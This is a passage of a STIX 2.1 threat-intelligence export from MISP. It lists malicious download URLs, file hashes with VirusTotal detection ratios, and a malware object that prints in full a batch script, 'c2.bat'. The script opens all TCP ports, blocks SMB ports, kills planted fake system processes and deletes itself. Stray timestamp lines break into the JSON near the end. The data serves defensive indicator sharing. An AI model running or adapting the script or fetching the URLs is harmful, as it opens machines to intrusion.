"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea5026-2614-4801-98d5-41c8950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:36:54.000Z" ,
"modified" : "2019-05-26T08:36:54.000Z" ,
"pattern" : "[url:value = 'http://down.0814ok.info:8888/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:36:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--380c7782-2dd4-443a-9108-bf700a7d0b43" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:50.000Z" ,
"modified" : "2019-05-26T08:25:50.000Z" ,
"pattern" : "[file:hashes.MD5 = 'b0b34b3a52b31e001b0582a70cad2aa2' AND file:hashes.SHA1 = 'de1318abdb0f202181c360d933ea543b2b8c85dd' AND file:hashes.SHA256 = 'ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:50.000Z" ,
"modified" : "2019-05-26T08:25:50.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-23T00:40:50" ,
"category" : "Other" ,
"uuid" : "6bb41516-4b77-4319-9bd1-2ecc84212902"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9/analysis/1558572050/" ,
"category" : "Payload delivery" ,
"uuid" : "e1a0aedc-fef3-47ac-96bf-1346a0917178"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/57" ,
"category" : "Payload delivery" ,
"uuid" : "81466fe0-9b85-43b0-8734-8abf874f6430"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:50.000Z" ,
"modified" : "2019-05-26T08:25:50.000Z" ,
"pattern" : "[file:hashes.MD5 = 'b340e1cdf15eb702ed14e05b42163910' AND file:hashes.SHA1 = '9aafb2147de42cea11d6e798721554ba456f34e8' AND file:hashes.SHA256 = 'fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:50.000Z" ,
"modified" : "2019-05-26T08:25:50.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-02-24T00:01:11" ,
"category" : "Other" ,
"uuid" : "ba54ef1f-42d0-4d51-b3a8-55af788d40f7"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9/analysis/1550966471/" ,
"category" : "Payload delivery" ,
"uuid" : "f569b93d-067a-4d0d-85dd-4d9c568fb189"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/51" ,
"category" : "Payload delivery" ,
"uuid" : "ff3e5153-e691-4326-b9b7-1ce6b44633e0"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:50.000Z" ,
"modified" : "2019-05-26T08:25:50.000Z" ,
"pattern" : "[file:hashes.MD5 = '942a3b5532bd6e4bdfea13cf077dded5' AND file:hashes.SHA1 = '5eea109a6d3f5f521a82bdff2532dec5f376e071' AND file:hashes.SHA256 = '84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2018-07-03T21:19:21" ,
"category" : "Other" ,
"uuid" : "1dc2c7b3-c04b-4a28-b258-580b4e22057b"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088/analysis/1530652761/" ,
"category" : "Payload delivery" ,
"uuid" : "3fcfec4a-4286-4ab7-b3a1-e502fabfaf8d"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "18/57" ,
"category" : "Payload delivery" ,
"uuid" : "3118f2c7-2fed-4e23-b896-d0dbb81ac716"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--b2749b84-7bae-418b-b58a-278ee29eefea" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"pattern" : "[file:hashes.MD5 = 'f2e4361d57eef76cbc5727245fe402f8' AND file:hashes.SHA1 = 'c58b5aa5728e8bf381470ad89d234463cd992937' AND file:hashes.SHA256 = '2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-03-15T00:02:54" ,
"category" : "Other" ,
"uuid" : "f7719a96-7a86-419d-b29f-e622a275a9bb"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830/analysis/1552608174/" ,
"category" : "Payload delivery" ,
"uuid" : "94c66b94-2553-4cd0-adac-de1f210c5ac5"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "16/55" ,
"category" : "Payload delivery" ,
"uuid" : "f14e3ba7-10ba-43fb-b70b-bca1f43972d8"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--7eab9890-1152-4540-b14c-b1713dd74db7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"pattern" : "[file:hashes.MD5 = '4be50da2219f8dc41f46e7844e265e87' AND file:hashes.SHA1 = 'c2ab04184e75649fdf85165fffd02f1f8c4c8bba' AND file:hashes.SHA256 = 'b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-01-14T04:05:17" ,
"category" : "Other" ,
"uuid" : "20fed181-b496-436f-bd07-e34870c1a396"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3/analysis/1547438717/" ,
"category" : "Payload delivery" ,
"uuid" : "07e4489f-94f7-493f-aa56-c6f95cab3002"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "23/56" ,
"category" : "Payload delivery" ,
"uuid" : "b0f1138a-a269-414a-8e73-27d688dac9b2"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"pattern" : "[file:hashes.MD5 = 'e1fa5e03ddfe7c81f3f80d88a7162b5f' AND file:hashes.SHA1 = '72bb026e618e317eb231417b573a38d805c7bb00' AND file:hashes.SHA256 = '6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2018-11-08T08:34:45" ,
"category" : "Other" ,
"uuid" : "9527b674-741a-4d37-8e0d-5491ca6e906f"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae/analysis/1541666085/" ,
"category" : "Payload delivery" ,
"uuid" : "3349c61c-757c-4fac-99a6-8ad73aabc00a"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/57" ,
"category" : "Payload delivery" ,
"uuid" : "38f5c57b-bb70-4651-91f8-6ee1011f0a12"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:51.000Z" ,
"modified" : "2019-05-26T08:25:51.000Z" ,
"pattern" : "[file:hashes.MD5 = 'd515a6b5638ec213be9bd4fe507e0b6b' AND file:hashes.SHA1 = '014ebb8391edb3fda76789e957ba973b3d97859c' AND file:hashes.SHA256 = '65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-03-11T02:04:00" ,
"category" : "Other" ,
"uuid" : "d7da733f-47f6-47be-adea-480154741de8"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c/analysis/1552269840/" ,
"category" : "Payload delivery" ,
"uuid" : "d4dc25cf-fedd-4a44-8065-323f4d48453b"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "18/56" ,
"category" : "Payload delivery" ,
"uuid" : "1ef30cb7-cba8-43dd-8c9a-544007af1d3a"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--94b76905-bc8e-4167-9633-b19262f34af8" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"pattern" : "[file:hashes.MD5 = '6d8960cd6c9ba68a69af812fc1c4741b' AND file:hashes.SHA1 = 'b59ec01ab58a1fbf49846ad34d0b48445aad3506' AND file:hashes.SHA256 = '968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:52Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2018-08-30T19:41:06" ,
"category" : "Other" ,
"uuid" : "4fbf8beb-ae11-4650-b5b7-8d185b468fe7"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02/analysis/1535658066/" ,
"category" : "Payload delivery" ,
"uuid" : "7d74e6cc-9eee-45bf-8eb4-43ef84cfe88d"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "11/57" ,
"category" : "Payload delivery" ,
"uuid" : "83006497-ca2b-4cac-8a39-68999f6b8ed8"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3751d8a9-13b3-4049-82ec-9607df7fc404" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"pattern" : "[file:hashes.MD5 = '0383c324c0c99f930c65d4034c22766b' AND file:hashes.SHA1 = 'a36f5113c764f60d9f48e7f9f7b779007f34bbc0' AND file:hashes.SHA256 = '58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:52Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2018-09-22T00:26:43" ,
"category" : "Other" ,
"uuid" : "fc3f86ce-b03b-4b8e-94cd-66ce90d55ef4"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da/analysis/1537576003/" ,
"category" : "Payload delivery" ,
"uuid" : "c1d11cf9-2265-4824-bd54-a19ffaebc658"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "19/59" ,
"category" : "Payload delivery" ,
"uuid" : "f137b164-8fed-4b75-a650-b39d099da3a7"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cea4e05-04c4-4f5f-ba43-4d3f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:27:49.000Z" ,
"modified" : "2019-05-26T08:27:49.000Z" ,
"name" : "c2.bat" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"Winbatch"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_script" : "sc config MpsSvc start= auto&net start MpsSvc\r\nnetsh advfirewall set allprofiles state on\r\nnetsh advfirewall firewall add rule name=\"tcp all\" dir=in protocol=tcp localport=0-65535 action=allow\r\nnetsh advfirewall firewall add rule name=\"deny tcp 445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny tcp 139\" dir=in protocol=tcp localport=139 action=block\r\nnetsh advfirewall firewall add rule name=\"tcpall\" dir=out protocol=tcp localport=0-65535 action=allow \r\nnetsh ipsec static add policy name=win\r\nnetsh ipsec static add filterlist name=Allowlist\r\nnetsh ipsec static add filterlist name=denylist\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445\r\nnetsh ipsec static add filteraction name=Allow action=permit\r\nnetsh ipsec static add filteraction name=deny action=block\r\nnetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny\r\nnetsh ipsec static set policy name=win assign=y \r\nver | find \"5.1.\" > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\NetBT\\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0\r\nattrib -s -h -r %WINDIR%\\systxm1\\*.*&attrib -s -h -r %WINDIR%\\system\\*.*\r\n@Wmic Process Where \"Name='winlogon.exe' And ExecutablePath='%WINDIR%\\system\\winlogon.exe'\" Call Terminate &del %WINDIR%\\system\\winlogon.exe\r\n@Wmic Process Where \"Name='svchost.exe' And ExecutablePath='%WINDIR%\\system\\svchost.exe'\" Call Terminate &del %WINDIR%\\system\\svchost.exe\r\ndel %WINDIR%\\debug\\c2.bat\r\nexit" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4e93-8834-4dd5-992d-4763950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:30:11.000Z" ,
"modified" : "2019-05-26T08:30:11.000Z" ,
"pattern" : "[url:value = 'http://74.222.1.38:8888/close.bat' AND url:x_misp_host = '74.222.1.38' AND url:x_misp_port = '8888' AND url:x_misp_resource_path = 'close.bat']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:30:11Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--195d072c-cab6-4370-b8ea-cf509e00959b" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:52.000Z" ,
"modified" : "2019-05-26T08:35:52.000Z" ,
"pattern" : "[file:hashes.MD5 = '4d437b5614edcc7d1ee5e4bcf5785ef9' AND file:hashes.SHA1 = '995bc00abbcde848148c5695c10e38ae6b5a9401' AND file:hashes.SHA256 = '43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:52Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:52.000Z" ,
"modified" : "2019-05-26T08:35:52.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-11T06:46:25" ,
"category" : "Other" ,
"uuid" : "1ad77ee7-7031-4210-9b8a-2a44aae36573"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5/analysis/1557557185/" ,
"category" : "Payload delivery" ,
"uuid" : "cb5a7bf2-2d0d-49c2-9d5f-c050da740604"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "5/59" ,
"category" : "Payload delivery" ,
"uuid" : "e8efebe6-f034-423e-9f89-70ee1b0dcb78"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--6eb30338-6dc9-477b-8de2-67c2ed6c814a" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--380c7782-2dd4-443a-9108-bf700a7d0b43" ,
"target_ref" : "x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--cf2fddd3-83bf-46e9-b475-35007bd258cc" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2" ,
"target_ref" : "x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--65989f15-22ab-401b-ba4a-21aeee25e7cc" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763" ,
"target_ref" : "x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--14d5fa60-cda6-4160-828e-29e5198dc170" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:52.000Z" ,
"modified" : "2019-05-26T08:25:52.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--b2749b84-7bae-418b-b58a-278ee29eefea" ,
"target_ref" : "x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--0da85027-872e-447b-8495-bc8a75a1f2b4" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:53.000Z" ,
"modified" : "2019-05-26T08:25:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--7eab9890-1152-4540-b14c-b1713dd74db7" ,
"target_ref" : "x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--77081070-a3a2-4ba6-8459-33b48d00afd4" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:53.000Z" ,
"modified" : "2019-05-26T08:25:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6" ,
"target_ref" : "x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
